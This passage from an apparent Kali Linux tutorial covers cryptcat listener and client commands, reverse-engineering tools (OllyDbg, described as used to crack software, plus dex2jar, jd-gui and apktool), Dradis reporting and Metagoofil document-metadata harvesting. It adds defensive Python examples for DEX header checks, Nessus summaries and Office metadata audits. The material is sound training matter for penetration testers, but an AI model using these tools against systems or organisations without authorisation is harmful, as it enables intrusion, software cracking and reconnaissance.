cryptcat -l -p port -n

root@kali:~# cryptcat -l -p 78 -n

Where,

 -l stands for listening for a connection
 -p stands for the port number parameter
 -n stands for not doing name resolution

On the client side, the connection command is “cryptcat IPofServer PortofServer”.

root@kali:~# cryptcat 127.0.0.1 78

13. Kali Linux ─ Reverse Engineering

In this chapter, we will learn about the reverse engineering tools of Kali Linux.

OllyDbg
OllyDbg is a 32-bit assembler-level analyzing debugger for Microsoft Windows applications.
Its emphasis on binary code analysis makes it particularly useful in cases where the source is
unavailable. Generally, it is used to crack commercial software.

To open it, go to Applications -> Reverse Engineering -> ollydbg

To load an EXE file, click the yellow “Open folder” icon, which is shown in a red square in
the above screenshot.

After loading, you will have the following view where you can change the binaries.


[Screenshot: OllyDbg with ollydbg.exe loaded, showing the disassembly pane, the register pane (general, segment and flag registers) and the FPU register pane ST0–ST7]

dex2jar
This is an application that converts an APK (Android) file to a JAR file in order to view the
source code. To use it, open the terminal and write “d2j-dex2jar -d /file location”.

In this case, the file is “classes.dex” on the desktop.

The following line shows that a JAR file has been created.


[Screenshot: file manager showing classes-dex2jar.jar in the Desktop folder]

jd-gui
JD-GUI is a standalone graphical utility that displays the Java source code of “.class” files.
You can browse the reconstructed source code. In this case, we can reconstruct the file
that we extracted with the dex2jar tool.

To launch it, open the terminal and write “jd-gui” and the following view will open.

To import the file, click the open-folder icon in the upper left corner and then select
the file.

Java Decompiler - javaversion.class

File Edit Navigate Search Help

javaversion.class

import java.io.PrintStream;

public class javaversion
{
  public static void main(String[] paramArrayOfString)
  {
    System.out.println(System.getProperty("java.specification.version"));
  }
}


apktool
Apktool is one of the best tools for reversing an entire Android application. It can decode
resources to nearly their original form and rebuild them after modifications have been made.

To open it, go to the terminal and write “apktool”.

To decompile an apk file, write “apktool d apk file”.

Decompilation will start as shown in the following screenshot.


I: Using Apktool [version] on [file].apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /root/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
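Both dex2jar and apktool start from the classes.dex inside the APK, which is a ZIP archive. Before handing an unknown sample to a decompiler it is worth checking that the DEX header is consistent, because the format carries its own integrity fields: the header begins with the magic "dex\n0NN\0", then an Adler-32 checksum over everything after the checksum field, then a SHA-1 signature over everything after the signature field, followed by the file size, header size (0x70) and endian tag (0x12345678). The parser below is an added example for this page, not code from either tool; it builds a constructed header-only DEX, packs it into an in-memory APK and validates the header, including what happens when a byte is tampered with.

```python
import hashlib
import io
import struct
import zipfile
import zlib

# DEX header: magic(8) checksum(4) signature(20) then 20 little-endian uint32 fields = 0x70 bytes
DEX_HEADER_FMT = "<8sI20s20I"
DEX_HEADER_SIZE = struct.calcsize(DEX_HEADER_FMT)
DEX_FIELDS = ("file_size", "header_size", "endian_tag", "link_size", "link_off",
              "map_off", "string_ids_size", "string_ids_off", "type_ids_size",
              "type_ids_off", "proto_ids_size", "proto_ids_off", "field_ids_size",
              "field_ids_off", "method_ids_size", "method_ids_off",
              "class_defs_size", "class_defs_off", "data_size", "data_off")
ENDIAN_CONSTANT = 0x12345678


def parse_dex_header(dex):
    """Parse and validate a DEX header; returns a dict of fields and check results."""
    if len(dex) < DEX_HEADER_SIZE:
        raise ValueError("too short to be a DEX file")
    magic, checksum, signature, *fields = struct.unpack_from(DEX_HEADER_FMT, dex, 0)
    if not (magic.startswith(b"dex\n") and magic.endswith(b"\0")):
        raise ValueError("bad DEX magic")
    info = dict(zip(DEX_FIELDS, fields))
    info["version"] = magic[4:7].decode("ascii")
    # Checksum covers everything after the checksum field itself (offset 12 to end)
    info["checksum_ok"] = checksum == (zlib.adler32(dex[12:]) & 0xFFFFFFFF)
    # Signature covers everything after the signature field (offset 32 to end)
    info["signature_ok"] = signature == hashlib.sha1(dex[32:]).digest()
    info["size_ok"] = info["file_size"] == len(dex)
    info["endian_ok"] = info["endian_tag"] == ENDIAN_CONSTANT
    return info


def inspect_apk(apk_bytes):
    """Validate every classes*.dex inside an APK; returns {name: header info}."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = sorted(n for n in zf.namelist()
                       if n.startswith("classes") and n.endswith(".dex"))
        return {n: parse_dex_header(zf.read(n)) for n in names}


def build_sample_dex(class_defs_size=3):
    """Constructed header-only DEX (no real code) with correct checksum and signature."""
    fields = dict.fromkeys(DEX_FIELDS, 0)
    fields.update(file_size=DEX_HEADER_SIZE, header_size=DEX_HEADER_SIZE,
                  endian_tag=ENDIAN_CONSTANT, class_defs_size=class_defs_size)
    tail = struct.pack("<20I", *(fields[f] for f in DEX_FIELDS))
    signature = hashlib.sha1(tail).digest()
    checksum = zlib.adler32(signature + tail) & 0xFFFFFFFF
    return struct.pack("<8sI20s", b"dex\n035\0", checksum, signature) + tail


def build_sample_apk(dex_bytes):
    """Constructed APK: a ZIP holding a placeholder manifest and the DEX."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"<!-- constructed placeholder -->")
        zf.writestr("classes.dex", dex_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    for name, info in inspect_apk(build_sample_apk(build_sample_dex())).items():
        print(name, "version", info["version"], "checksum_ok", info["checksum_ok"],
              "signature_ok", info["signature_ok"], "classes", info["class_defs_size"])
```

A failed checksum or signature on a sample is itself a finding: the Android runtime checks the checksum at install time, so a DEX that fails it has been edited after packaging, which is common in repackaged or patched applications.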

14. Kali Linux ─ Reporting Tools

In this chapter, we will learn about some reporting tools in Kali Linux.

Dradis
In all the work that we have performed, it is important to share the results that were
produced, to track our work, etc. For this purpose, Kali has a reporting tool called dradis,
which is a web service.

Step 1: To start Dradis, type “service dradis start”.

root@kali:~# service dradis start
root@kali:~#

Step 2: To open, go to Applications -> Reporting Tools -> dradis.

The web interface will open. Anybody on the LAN can open it at https://<IP of Kali
machine>:3004


Log in with the username and password that were set up the first time.

Welcome to Dradis

Server password
This server does not have a password yet, please set up one.
Password
Confirm Password

Meta-Server
You can create a new project or checkout one from the Meta-Server.
New project
Checkout project

Step 3: After logging in, you can import files from NMAP, NESSUS and NEXPOSE. To do so,
go to “Import from file” -> click “new importer (with real-time feedback)”.


Step 4: Select the file type that you want to upload. In this case, it is “Nessus scan” ->
click “Browse”.

[Screenshot: Dradis “Upload Manager” page]

If you go to the home page now, on the left panel you will see that the imported scans
are in a folder with their host and port details.

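What the importer extracts from a Nessus file is the host and port structure of the scan, which is also what you need when a scan has to be triaged without a reporting tool. The following parser is an added example for this page, not Dradis code or a Nessus tool: it reads the NessusClientData_v2 XML layout (ReportHost elements with HostProperties tags and ReportItem findings), builds a per-host summary of open ports and finding counts by severity, and orders hosts by their worst finding. The sample file, its hosts, plugin IDs and finding names are all constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

# Nessus severity levels as used in the ReportItem "severity" attribute
SEVERITY_NAMES = {0: "info", 1: "low", 2: "medium", 3: "high", 4: "critical"}

# Constructed .nessus sample (hosts, plugin IDs and findings are made up)
SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="constructed sample">
    <ReportHost name="192.0.2.10">
      <HostProperties>
        <tag name="host-ip">192.0.2.10</tag>
        <tag name="operating-system">Linux Kernel 4.x (constructed)</tag>
      </HostProperties>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="10001" pluginName="Service banner (constructed)"/>
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="2"
                  pluginID="10002" pluginName="Outdated web server (constructed)"/>
      <ReportItem port="443" svc_name="www" protocol="tcp" severity="3"
                  pluginID="10003" pluginName="Weak TLS configuration (constructed)"/>
    </ReportHost>
    <ReportHost name="192.0.2.11">
      <HostProperties>
        <tag name="host-ip">192.0.2.11</tag>
      </HostProperties>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="10004" pluginName="Scan information (constructed)"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


def summarize_nessus(xml_text):
    """Per-host summary: ip, os, open ports, finding counts by severity, worst severity."""
    root = ET.fromstring(xml_text)
    summary = {}
    for host in root.iter("ReportHost"):
        props = {t.get("name"): t.text for t in host.iter("tag")}
        ports = set()
        counts = {name: 0 for name in SEVERITY_NAMES.values()}
        max_sev = 0
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            counts[SEVERITY_NAMES.get(sev, "info")] += 1
            max_sev = max(max_sev, sev)
            # Port 0 denotes a host-level finding, not an open service
            if item.get("port") != "0":
                ports.add((int(item.get("port")), item.get("protocol", "tcp")))
        summary[host.get("name")] = {
            "ip": props.get("host-ip", host.get("name")),
            "os": props.get("operating-system", "unknown"),
            "ports": [f"{p}/{proto}" for p, proto in sorted(ports)],
            "findings": counts,
            "max_severity": SEVERITY_NAMES[max_sev],
        }
    return summary


def hosts_by_risk(summary):
    """Host names ordered from the worst maximum severity down, then by name."""
    level = {name: lvl for lvl, name in SEVERITY_NAMES.items()}
    return sorted(summary, key=lambda h: (-level[summary[h]["max_severity"]], h))


if __name__ == "__main__":
    s = summarize_nessus(SAMPLE_NESSUS)
    for h in hosts_by_risk(s):
        print(h, s[h]["max_severity"], s[h]["ports"], s[h]["findings"])
```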

Metagoofil
Metagoofil performs a Google search to identify documents, downloads them to the local disk
and then extracts their metadata. In this way it collects the metadata of public documents
belonging to a specific company, individual, subject, etc.

To open it, go to “/usr/share/metagoofil/”.

root@kali:~# cd /usr/share/metagoofil/
root@kali:/usr/share/metagoofil#


To start searching, type the following command:

python metagoofil.py

You can use the following parameters with this command:

 -d (domain name)
 -t (file type to download: doc, pdf, etc.)
 -l (limit the results: 10, 100, ...)
 -n (limit the number of files to download)
 -o (location to save the files)
 -f (output file)

In the following example, only the domain name is hidden.
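The metadata Metagoofil harvests comes from fields the office suite writes into the document package, so the defensive counterpart of this tool is checking your own documents before publishing them. The following extractor is an added example for this page, not Metagoofil's code: it reads the docProps/core.xml and docProps/app.xml parts of an Office Open XML file (docx, xlsx, pptx share this layout), returns the properties found, and lists the ones that typically disclose usernames, software versions or organisation names. The sample document is constructed in memory with made-up values.

```python
import io
import xml.etree.ElementTree as ET
import zipfile

# Properties that commonly reveal people, software versions and internal names
INTERESTING = ("creator", "lastModifiedBy", "Application", "AppVersion", "Company", "Manager")
METADATA_PARTS = ("docProps/core.xml", "docProps/app.xml")


def build_sample_docx():
    """Constructed minimal Office Open XML package with the usual metadata parts."""
    core = ('<cp:coreProperties '
            'xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" '
            'xmlns:dc="http://purl.org/dc/elements/1.1/">'
            '<dc:title>Quarterly report</dc:title>'
            '<dc:creator>j.doe</dc:creator>'
            '<cp:lastModifiedBy>CORP\\a.smith</cp:lastModifiedBy>'
            '</cp:coreProperties>')
    app = ('<Properties '
           'xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">'
           '<Application>Microsoft Office Word</Application>'
           '<AppVersion>16.0000</AppVersion>'
           '<Company>Example Corp</Company>'
           '</Properties>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
        zf.writestr("docProps/app.xml", app)
        zf.writestr("word/document.xml", "<document/>")   # body content is irrelevant here
    return buf.getvalue()


def extract_office_metadata(doc_bytes):
    """Return {property: value} from the core and extended property parts."""
    meta = {}
    with zipfile.ZipFile(io.BytesIO(doc_bytes)) as zf:
        names = set(zf.namelist())
        for part in METADATA_PARTS:
            if part not in names:
                continue
            root = ET.fromstring(zf.read(part))
            for el in root.iter():
                local = el.tag.rsplit("}", 1)[-1]      # strip the XML namespace
                if el.text and el.text.strip():
                    meta[local] = el.text.strip()
    return meta


def leaky_fields(meta):
    """Sorted names of the properties present that are worth stripping before publication."""
    return sorted(f for f in INTERESTING if f in meta)


if __name__ == "__main__":
    meta = extract_office_metadata(build_sample_docx())
    for field in leaky_fields(meta):
        print(f"{field}: {meta[field]}")
```

Running the extractor over a directory of outbound documents, and comparing the creator and lastModifiedBy values with your user naming scheme, shows exactly what an external Metagoofil run would learn about account names and software versions.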
